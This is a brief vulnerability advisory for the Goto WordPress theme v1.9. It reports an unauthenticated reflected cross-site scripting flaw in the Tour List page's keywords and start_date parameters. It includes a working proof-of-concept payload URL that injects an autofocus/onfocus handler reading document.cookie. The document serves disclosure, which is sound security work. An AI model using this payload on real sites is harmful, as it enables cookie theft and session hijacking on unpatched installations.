The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
Payload: https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=<input%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(`m0ze`)%3Balert(document.cookie)%3B%2F%2F>&start;_date=<input%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(`m0ze`)%3Balert(document.cookie)%3B%2F%2F>&avaibility;=13
m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt